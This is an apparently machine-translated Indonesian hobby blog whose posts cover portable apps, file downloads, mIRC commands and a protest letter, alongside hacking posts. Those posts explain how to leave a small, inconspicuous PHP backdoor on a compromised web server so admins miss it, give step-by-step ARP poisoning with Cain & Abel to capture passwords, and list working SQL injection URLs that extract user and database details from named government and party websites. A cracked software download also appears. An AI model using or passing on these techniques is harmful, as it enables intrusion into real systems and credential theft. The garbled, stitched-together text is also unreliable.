Download portable application

portable application,
I think is the most important if we are traveling or are not located in front of the personal computer
why?
because habits are sooo in front of a computer 24 hours a taste makes portable application as required

I only use flash disk as a data storage software and portable when traveling
one of the applications that can provides packaged software suitable for use on portable media, with Leaving settings files on the host computer.
Includes information developer is in http://portableapps.com/ site and provide a good variety of portable application
quite complete

I have a lasting impact if travel is TOP 10 this my favorite portable application

1. notepad++ portableNotepad++ Portable is the handy Notepad++ text editor packaged as a portable app so you can do your development on the go. It has all the same great features of Notepad++ including support for multiple languages and an extensive plugin system, but there's nothing to install.


2. XAMPP portable
XAMPP is an integrated server package of Apache, mySQL, PHP and Perl (the AMPP in XAMPP) that all run from a removable drive. Everything is pre-configured and ready to go just by unzipping or installing it.



3. FileZilla Portable
FileZilla Portable is the popular FileZilla FTP client packaged as a portable app, so you can take your server list and settings with you. You can place it on your USB flash drive, iPod, portable hard drive or on a CD and use it on any computer, without leaving any personal information behind without install

4. Mozilla Firefox Portable Edition
Mozilla Firefox ®, Portable Edition is the popular Mozilla Firefox web browser Launcher as a portable app, web browser correct

5. putty portable
PuTTY Portable is the popular PuTTY telnet and SSH client packaged as a portable app, so you can connect in to your systems on the go. You can place it on your USB flash drive, iPod, portable hard drive or a CD and use it on any computer, without leaving any personal information behind.


6. Sumatra PDF Portable
Sumatra PDF Portable is the lightweight Sumatra PDF packaged as a portable app, so you can view PDF files on the go.

7. OpenOffice.org Portable
OpenOffice.org Portable is the complete OpenOffice.org office suite -- including a word processor, spreadsheet, presentation tool, drawing package and database -- packaged as a portable app, so you can take all your documents and everything you need to work with them wherever you go.


8. Pidgin Portable
Pidgin Portable is the versatile Pidgin instant messaging client packaged as a portable app, so you can take your IM settings and buddy lists with you. It has all the same great features as Pidgin, including support for AOL, Yahoo, MSN, ICQ and Jabber networks, but there's nothing to install on the local PC. You can also easily add portable encryption plugins for secure, encrypted messaging.


9. VLC Media Player Portable
VLC Media Player Portable is the popular VLC media player packaged as a portable app, so you can take your audio and video files along with everything you need to play them on the go. You can place it on your USB flash drive, iPod, portable hard drive or a CD and use it on any computer, without leaving any personal information behind.

10. GIMP Portable
GIMP Portable is the popular the GIMP for Windows image editor packaged as a portable app, so you can take your images with you and do your editing on the go.


link for portable apps http://portableapps.com

simple PHP server backdoor

Techniques backdooring web server

Let ...
if the hearing would be in our minds phpshell, aspshell, or Techniques backdoring use ssh and others.
But we will study this time is about php shell, and you all have with php shell c99 for example, r57, c100, and others.

as if we find a bug or a slit in the web server that can inject it with php shell script we must Planted in the backdoor so that we can soon enter into the system again ....
It also can we patch again slit or holes where we so no person other than we are in, although the admin themselves do not know: P.

Suspicion webnya admin will have is to go in to see log files or with the suspicious files in the web server, Therefore, if we inculcate phpshell using the names of files that are not suspicious.
But the admin is not carefully will not suspicious of it, but the admin will purchase carefully the size of the file that is not normal in the web server, so from here we need a backdoor that is not suspicious, and small size.

So what the solution?

only a simple bug in the new server so that we can enter again, the remote file inclution errors occur because of the configuration files php.
then we make like this
php files you create in the name you give, here's an example file name help.php

and we help.php content with the php code below



see the size, this is a very small files
and we can upload to our server target

and very small files that will not attract attention from the admin, we can use it with the way http://target.com/[patch] /help.php?url=evilcode.txt???

Just from my simple, safe and happy to try hacking


cool people

Download souljah album bersamamu


I think this song is great, cool to be heard.
souljah of this album is cool
you can download the song souljah-bersamamu here
one album:)

http://kecemplungkalen.co.cc/tools/Souljah - Bersamamu.rar

road map for Yogyakarta

about jogjakarta
whether you are still confused with jogjakarta?
good roads and location?

I have the map software in Euless, please download the flash player is Hopefully help

please download here

http://kecemplungkalen.co.cc/tools/PETA-YOGYA.rar

Travian game

travian game browser

game?
why not:)
since fraudulent home alone most of my gaming is one of TRAVIAN
currently travian with english and there was even 3 servers in use in Indonesia for the players travian.
the game sizable mengasikan little sense to expel me because of saturation in front of the computer that's too long:)
I own this game too much time waiting in the appeal playing time he he
I do not care?
not too serious gaming, the name game also maneuver

if you want to try this game only, please

visit http://www.travian.co.id/
or here http://www.travian.co.id/?uc=id2_15933

Sniffing with Cain & Abel

Before we discuss about how to sniffing action in a LAN network, it's good that we know what is meant by sniffing.
Sniffing is a tapping action. See how that is used, sniffing divided kedalan two categories, namely passive sniffing do without tapping the data packet or any of the network while active in the packet sniffing the network or send a packet with the MAC address change randomly in a number of very many. Active sniffing usually use the additional tool (which is normally used Etherflood), but this time we will only discuss how to use the passive sniffing and tools that we use is Cain & Abel.
Cain & Abel is a tool that is very popular and very simple way penggunaannyapun, to sedot Cain & Abel can be taken on the topic TOOLS.
The steps that must be done:
1. Install the program Cain & Abel
2. Run Cain
3. To do sniffing action, click on the tab of sub-Sniffer
4. Click the tab of sub-APR
5. Click the Configure menu - Configure dialog will appear that contains several of the sub-configuration tab - click the tab Sniffer - will appear some information about the adapter, IP Address, etc. - click on a line below the previous menu that contains a description of the computer's IP Address, MAC etc. - and then OK.
6. Cain's active by clicking Start button
7. So that we have the computer capability routing, click the Start button APR
8. Run Command Prompt
9. Make communication with the target computer to do with pinging the IP Address to the target computer, for example c: \ ping 192.168.0.2, in some cases our pinging must do (according to my experience, pinging is the fastest way to make communication with the target computer) more than one computer , It aims to make computers as the gateway.
10. Cain on the table, two bermenu the same status, IP Address, MAC Address, etc.. To start, click the top of the table (the router area), then click the plus sign (Add to the list)
11. New dialog will appear ARP Aim Routing. Click the IP Address that the target computer in the left column and click the IP Address computer gateway in the right column. Click OK
After the IP Address into the list, we wait in traffic lived a packet caught by Cain. To know the results caught, click the Passwords tab.

- The work of Cain:
Cain & Abel poison ARP table of the target computer so that communication between a computer with the target should be the gateway through the computer.

- Issues that are often found:
Cain & Abel is often identified as viruses by antivirus software, this is because antivirus software using the facilities heuristic-guessing nebak file as a virus, this function aims to identify new viruses that have not yet detected by antivirus databases. However, this facility sometimes a "false warning" and assume certain programs, especially a hack tools, as viruses, and even considered any other anti-virus.

- How to prevent this action snifing:
To prevent this action, do the changes in the ARP, in this type of ARP that we will change the dynamic of a static. How: c: \ ARP-s [IP Address] [MAC Address] and to return to the original state, change the attributes of a-s-d

and software Cain & Abel can be downloaded at
http://www.oxid.it/cain.html



quoted from
http://carajitu.byethost13.com/sniffing-dengan-cainabel.html

NEED HACKERS SUPPORTs TO STOP GLOBAL WARMING!!


from http://serverisdown.org/2nd/



Mount Kendeng threat!


Brother-sister,
Colleagues fighter, knight virtual world, rover without a name, reliability of rebels, bandits, bandits social, sepucuk through this letter, along with the arrival of the first rain in the rainy season, before I send a greeting to you, hopefully given the health and longevity.

News that I kabarkan this is about the development plan by the cement factory of PT. Semen Gresik (Persero) in the village of Kedumulyo Subdistrict Sukolilo, Pati District, which is desired by the District Government and Pati Regent Tasiman corrupt.

And we hope the government is not the same. Welfare is said by the government and PT. Semen Gresik is the lie. This is a conspiracy with the environmental devastation in the name of improving the welfare and reduction of unemployment. Is beginning to receive disaster for us, peasantry and the people around.

The speculator speculator-utilized land on the situation with the cockroach premannya. The Village Head and instruments to conduct indoctrination of citizens. Anyone subject to the policy that created the accident and the Fire for themselves, families, children and grandchildren later.

We do matches, one by JM-KDP (Community Care Network Kendeng Mountains. We joined the majority here as farmers, farm laborers and community classes. Pemkab also eventually give movements from that sedulur-sedulur Unsurprisingly, the higher education not formally This has no strong base.

Even in areas Sulolilo no more than 67 springs, which is used by thousands of residents of all 75-district Sukolilo, start to the needs of the household daily to irrigate agricultural land in the District of Sukolilo which includes 16 villages.

Tomorrow is the last day time limit subpoena from the PT. Semen Gresik (Persero) Tbk. given to our brother, Gunritno. Through the power of law, Fredrik J. Pinakurary, S.H. the PT. Semen Gresik will require a criminal with articles 310, 311 and 335 Penal Code, if we can not prove our arguments.

Some time ago PT. Semen Gresik (Persero) Tbk. also offer money to 100 million sedulur-sedulur Sikep in Sukolilo through messengers Gurbernur Central Java. After the colonial Dutch, strategies and compete fragile sheep, is still the tactics of the capitalist business practices to enforce.

Sedulur Sikep very aware of that they reject the bid.

Tomorrow Day on Wednesday, 3 September 2008 plan SBY will invite President Emil Salim asked for explanations about the development plan cement factory in Melton Mowbray.

If the friends struggle to support us, please send petitions, letters of protest, or to any Emil Salim by e-mail: esalim at rad.net.id

We realize and believe that all people have the same power to change the world for the better from now.

Forward and hold the fighter sovereignty and human nature!

Regards,
From the mountains of North Kendeng
Koko '
Sukolilo, Pati, 31 August 2008

"Dragon is moving slowly, bend the left-right; with a sharp eye to monitor the situation."

stupid sql injection

ho ho ho postings this very quality people even just a truck info:)
Poker experience the place nyalain kompie favored iseng2 Enjoy it while kayaking beginian again nemunya wekekekeke
there is a rift in the sql injection site KPU surabaya wekekekekekeke .....

wong said, sensitive to experience the roads to the outside of the country?
ngurus web's even capable thin !!!!!! geblek ......
I want people's money habisin ... fvck it .....

I was the admin that even in a pay packet of money people can benerin even though people in jahilin;)

I klihatan NOH

http://kpu.surabaya.go.id/breakone.php?nid=-46% 20union% 201.2% 20select, version (), 4, system_user (), user (), 7, a database () / *


http://pusat.golkar.or.id/galeri_golkar.php?g_id=-1% 20union% 201.2% 20select, concat (user (), char (58), database (), char (58), version ()), 4 / *


I have eight duitnya in a charity bagi2 yah ...
I was wekekekeke

regard

cool people

Download Stardock WindowBlinds 6.10.55 full


This is for the sensitive display windows is even more beautiful and beratin performance or engine performance,

tolerably passerby create the look interesting with care even though the display windows of a so-so, even ventures in the debate would thank screenshoot I know the shape;)

But it was the theme of the debate, please find your own: D
google in many thin.

StardockWindowBlinds 6:10:55 it's the patch happens you can use the full version, and I loved how I patch it on there ....




But now please download the file it


here

Command mIRC

Command - Command mIRC
comand dasar
1. Ganti nick = /nick (nick baru)
2. Notice = /notice (nick) (pesan)
3. Masuk Channel = /join (#channel)
4. Keluar Channel = /part (#channel)
5. Keluar IRC = /quit (pesan)
6. Ganti Server = /server (nama server)
7. Private = /query (nick)
8. Invite = /invite (nick) (#channel)
9. Mode I = /mode (nick) +I
10. Ignore = /ignore (nick)
11. Action = /me (pesan)
12. Whois = /whois (nick)
13. Away = /away (pesan)
14. Balik Away = /away
15. Ping = /ping (nick)
16. Bersihkan layar = /clear

NickServ :

1. Register Nick = /ns register (password) (email)
2. Identify Nick = /ns identify (password)
3. Ganti Pass = /ns set passwd (passwd lama) (passwd baru)
4. Enforce = /ns set enforce (on/off)
5. Kill Ghost = /ns ghost (nick) (passwd)
6. Kill = /ns set kill (on/off)
7. Recover = /ns recover (nick) (passwd)
8. Release = /ns release (nick) (passwd)
9. Drop = /ns drop (nick)
10. No Op = /ns set noop (on/off)
11. No Memo = /ns set nomemo (on/off)
12. Info = /ns info (nickname)
13. URL = /ns set url (http:// )
14. Ganti Email = /ns set email (password) (emailnya)
15. Showemail = /ns set showemail (on/off)
16. MailBlock = /ns set mailblock (on/off)

comand læn²
1. Register Channel = /cs register (#channel) (passwd) (desikripsi)
2. Identify Channel = /cs identify (#channel) (passwd)
3. Successor = /cs set (#channel) successor (nickname)
4. Drop Channel = /cs drop (#channel)
5. Ganti Pass Channel = /cs set (#channel) passwd (pass lama) (pass baru)
6. Lupa Pass Channel = /cs sendpass (#channel) (email)
7. Founder Baru (Identify #Channel Dulu) = /cs set (#channel) founder
8. Mailblock = /cs set (#channel) mailblock (on/off)
9. Private = /cs set (#channel) private (on/off)
10. Set Description = /cs set (#channel) desc (deskripsinya)
11. Set Topic = /cs set (#channel) topik (topiknya)
12. Set URL = /cs set (#channel) url (alamat url-nya)
13. Set Mlock = /cs set (#channel) mlock (tulis modenya)
14. Set Restrict = /cs set (#channel) restrict (on/off)
15. Set KeepTopic = /cs set (#channel) keeptopic (on/off)
16. Set TopikLock = /cs set (#channel) topikclock (off/sop/founder)
17. Set Memo Channel = /cs set (#channel) memo (none/aop/sop/founder)
18. Set OP-Guard = /cs set (#channel) opguard (on/off)
19. Add/Del Sop = /cs sop (#channel) (add/del) (nick)
20. Add/Del Aop = /cs aop (#channel) (add/del) (nick)
21. Lihat List Op = /cs (aop/sop) (#channel) list
22. Akick Nick = /cs akick (#channel) (add/del) (Nick!*@*)
23. Akick Ident = /cs akick (#channel) (add/del) (*!ident@*)
24. Akick IP Address = /cs akick (#channel) (add/del) (*!*@IP Addressnya)
25. Akick List = /cs akick (#channel) list
26. Op List = /cs (sop/aop) (#channel) list
27. Lihat Akses = /cs why (#channel) (nick)
28. Unban = /cs unban (#channel) (nick)
29. Invite = /cs invite (#channel) (nick)
30. Info = /cs info (#channel)
31. Access Channel = /cs access (#channel) (nick op)
32. Count = /cs count (#channel)

by dxsesa7

weak system of government web security

ups ....
Headlines from only one server is yes, no it's india
I have already moved to the adult age to 63 years and the development of technology that the more the more rapidly it seems increasingly behind if we see another country that is increasingly growing rapidly.
but during must always remain in the compound, yesterday when I try to go several government websites I also see a little surprised that the weak security in the use of government for the website.
lhoh ....
adminnya not in the pay packet of money Tho country? but even passerby?
And so it ....
Sure passerby how do you work? what I was watching what chating step: p
wekekeekekeek .....

DEC, but instead I only care to the nation to experience this in the Poker pay packet of money, my people ..., right??
contohkan only
This government website


http://www.surabaya.go.id/
http://www.gunungkidulkab.go.id/
http://www.bapeda.pemda-diy.go.id/
http://www.kedirikab.go.id/


in this web, there are two slit sql injection see that I was

and many other government websites are often in jahilin by the hackers: p
some cases, we often hear the government subject deface the web ..
wekekeekekek
one of whom come ......
look now is not the time to try, I want to try to move forward
web admin for the immediate repair of your system or contact

kecemplungkalen [at] hacker [dot] co [dot]id